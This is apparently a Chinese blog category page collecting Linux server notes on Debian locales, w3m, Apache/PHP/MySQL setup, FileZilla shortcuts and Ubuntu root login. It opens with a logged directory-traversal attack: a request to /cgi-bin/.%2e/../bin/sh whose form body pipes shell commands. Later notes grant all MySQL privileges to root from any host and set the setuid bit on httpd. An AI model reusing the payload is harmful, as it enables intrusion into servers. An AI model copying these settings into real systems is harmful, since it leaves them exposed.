分类: linux

目录穿越

威胁类型

目录穿越(filedirtraversal_in)

攻击方式

POST

攻击路径

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

攻击头部

POST /cgi-bin/../../../../bin/sh HTTP/1.1
Host: 139.155.148.254:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

攻击内容

A=|echo;echo -n hJsVfanxjL|md5sum

linux debain 用户配置

中文 

apt-get install locales

dpkg-reconfigure locales

勾选“en_US.UTF-8”和“zh_CN.UTF-8”

apt-get install xfonts-intl-chinese

重启



	w3m




	



apt-get install w3m-img zhcon

H    显示帮助  
q    退出,会有提示的  
j,k,l,h  移动光标,就像vim中一样  
J/K   向下/向上滚屏  
</>   左右滚屏  
Enter 输入 
T     打开一个新标签页  
Esc-t 打开所有标签页,供你选择,使用jk来上下移动  
{/}   在标签页中切换  
U     输入新的网址  
B     后退  
Ctrl+q 关闭当前标签页  
/     向后查找当前页  
?     向前查找当前页



	


	





	

		
		
linux debain服务器配置
	


	
	
	

		
debian 软件包 https://packages.debian.org/stable/


whereis apache2
dpkg -L apache2 查看安装的包在哪里


apt-get install locales
dpkg-reconfigure locales
#勾选“en_US.UTF-8”和“zh_CN.UTF-8”
apt-get update#安装时提示404则更新下
apt-get dist-upgrade
apt-get install apache2
apt-get install mysql-server
apt-get install php7.2-fpm
apt-get install php7.2-mbstring
apt-get install php7.2-dom
apt-get install php7.2-curl
apt-get install php7.2-gd
apt-get install php7.2-mysql
service php7.2-fpm restart
apt-get install git
apt-get install node
apt-get install npm
npm install -g pm2
apt-get install redis-server
#composer
php -r "copy('https://install.phpcomposer.com/installer', 'composer-setup.php');"
php composer-setup.php
php -r "unlink('composer-setup.php');"
mv composer.phar /usr/local/bin/composer
#apache配置
vi /etc/apache2/apache2.conf
# AllowOverride all
a2enmod rewrite#开启重写模块,取消模块a2dismod
#gzip
a2enmod deflate#压缩模块
a2enmod headers
vi /etc/apache2/mods-available/deflate.conf
#添加
        SetOutputFilter DEFLATE
        SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary
        SetEnvIfNoCase Request_URI .(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary
        SetEnvIfNoCase Request_URI .(?:pdf|mov|avi|mp3|mp4|rm)$ no-gzip dont-vary
        AddOutputFilterByType DEFLATE text/*
        AddOutputFilterByType DEFLATE application/ms* application/vnd* application/postscript application/javascript application/x-javascript
        AddOutputFilterByType DEFLATE application/x-httpd-php application/x-httpd-fastphp
        BrowserMatch ^Mozilla/4 gzip-only-text/html
        BrowserMatch ^Mozilla/4.0[678] no-gzip
        BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
a2enmod deflate
#apache站点
cd /etc/apache2/sites-available
cp -f 000-default.conf xuanzeta.com.conf
vi xuanzeta.com.conf
#重写
#RewriteEngine on 
        #RewriteCond   %{HTTPS} !=on 
        #RewriteRule   ^(.*)  https://%{SERVER_NAME}$1 [L,R] 
#servername
ServerName xuanzeta.com
DocumentRoot /var/www/web
#代理
#DocumentRoot /var/www/zhshht/public
        ProxyPreserveHost On 
        ProxyPass / http://localhost:6001/ 
        ProxyPassReverse / http://localhost:6001/ 

:wq
a2ensite xuanzeta.com.conf#启动站点,取消站点a2dissite
service apache2 reload
service apache2 restart
#远程mysql
#netstat -an|grep 3306 端口未开放
vi /etc/mysql/my.cnf
#bind-address = 127.0.0.1
service mysql restart
mysql -u root -p


 









	


	







	

		
		
linux下安装FileZilla
	


	
	
	

		

	filezilla客户端安装




	filezilla客户端下载




	将文件夹放到/usr/local/下,或者其他位置也可。




	默认启动在 FileZilla3/bin/filezilla




	快捷方式创建:




	在桌面创建一个文档,更名filezilla.desktop



内容


[Desktop Entry]
Name = FileZilla
Type = Application
Exec = /usr/local/FileZilla3/bin/filezilla



	保存之后右键文件-属性-权限-允许作为程序执行文件




	ubuntu系统filezilla桌面快捷方式




	


	





	

		
		
linux学习三(ubuntu系统)
	


	
	
	

		
ubuntu下使用root登陆 



	设置root



sudo passwd root


输入设置密码


vi /etc/lightdm/lightdm.conf


[SeatDefaults]
greeter-session=unity-greeter
user-session=ubuntu
greeter-show-manual-login=true #手工输入登陆系统的用户名和密码
allow-guest=false #不允许guest登录


用root权限打开窗口 


sudo nautilus


创建桌面快捷方式 



	以woekbench为例,默认启动命令mysql-workbench




	在桌面创建一个文档,更名workbench.desktop



内容


[Desktop Entry]
Name = Workbench
Type = Application
Exec = mysql-workbench



	保存之后右键文件-属性-权限-允许作为程序执行文件




	ubuntu系统workbench桌面快捷方式




	


	





	

		
		
linux系统mysql
	


	
	
	

		
grant 权限1,权限2,…权限n on 数据库名称.表名称 to 用户名@用户地址 identified by ‘密码’;



	权限:select,insert,update,delete,create,drop,index,alter,grant,references,reload,shutdown,process,file




	所有权限:all privileges或者all




	所有数据库所有表:*.*




	所有地址:’%’



grant all privileges on *.* to root@'%' identified by 'password'



	




	


	





	

		
		
linux学习二(apache)
	


	
	
	

		

	源码编译安装




	apache安装




	官网下载apache



apache文件目录下编译


./configure --prefix=/usr/local/apache --enable-mods-shared=all


动态加载所有模块:–enable-mods-shared=all

-shared动态加载,去掉则静态加载,推荐–enable-mods-shared=all简单方便,只不过据说动态加载性能要比静态慢5%。



	关于加载模块详情推荐一篇博文apache 静态编译和动态编译参考




	提示:APR not found. Please read the documentation




	apr和apr-util下载 pcre下载



apr编译安装


./configure --prefix=/usr/local/apr
make
make install


apr-util编译安装


./configure --prefix=/usr/local/apr-util --with-apr=/usr/local/apr
make
make install


pcre编译安装


./configure --prefix=/usr/local/pcre
make
make install


编译apache


./configure --prefix=/usr/local/apache --enable-mods-shared=all



	提示:APR-util not found. Please read the documentation



添加apr和apr-util以及pcre参数路径


./configure --prefix=/usr/local/apache --enable-mods-shared=all --with-apr=/usr/local/apr --with-apr-util=/usr/local/apr-util --with-pcre=/usr/local/pcre


apache 启动/停止/重启:apache目录下./httpd -k start/stop/restart

或者:sudo /usr/local/apache/bin/httpd -k start/stop/restart

非root用户启动需要给httpd权限:sudo chmod u+s httpd



	php安装




	xml2-config下载



python-dev安装


sudo apt-get update
sudo apt-get install python-dev


xml2-config编译安装


./configure --prefix=/usr/local/xml2-config
make
make install


php编译安装


./configure --prefix=/usr/local/php --with-apxs2=/usr/local/apache/bin/apxs --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-libxml-dir=/usr/local/xml2-config
make
make install


配置apache支持php


sudo vi /usr/local/apache/conf/httpd.conf
#查找字符串AddType,并增加
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
#查找字符串
DirectoryIndex
#并修改为
DirectoryIndex index.html index.php default.php


配置php


#查看ini目录
./php --ini
sudo cp /home/liuman/下载/php-7.0.4/php.ini-development  /usr/local/php/lib/php.ini


php编译扩展



	phpize




	m4下载 autoconf下载



先编译安装m4然后编译安装autoconf


./configure
make
make install


开启openssl


sudo apt-get install libssl-dev


#进入到目录etc/openssl
phpize
./configure --with-php-config=/usr/local/php/bin/php-config
make
make install


php.ini加extension =openssl.so



	




	yum安装




	apache安装



yum install httpd -y


apache自启动


chkconfig httpd on


apache服务操作


service httpd start
service httpd stop
service httpd restart


安装php和mysql


yum install php


yum install mariadb


php版本如果太旧,先删除自带的php版本再安装,如果版本够用则直接安装php组件。


yum remove php*


安装第三方源和新版本php


rpm -Uvh https://mirror.webtatic.com/yum/el7/epel-release.rpm 
rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.1-1.el5.rf.x86_64.rpm  
rpm -ivh rpmforge-release-0.5.1-1.el5.rf.x86_64.rpm
yum install php56w


安装php组件


yum install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash


重启apache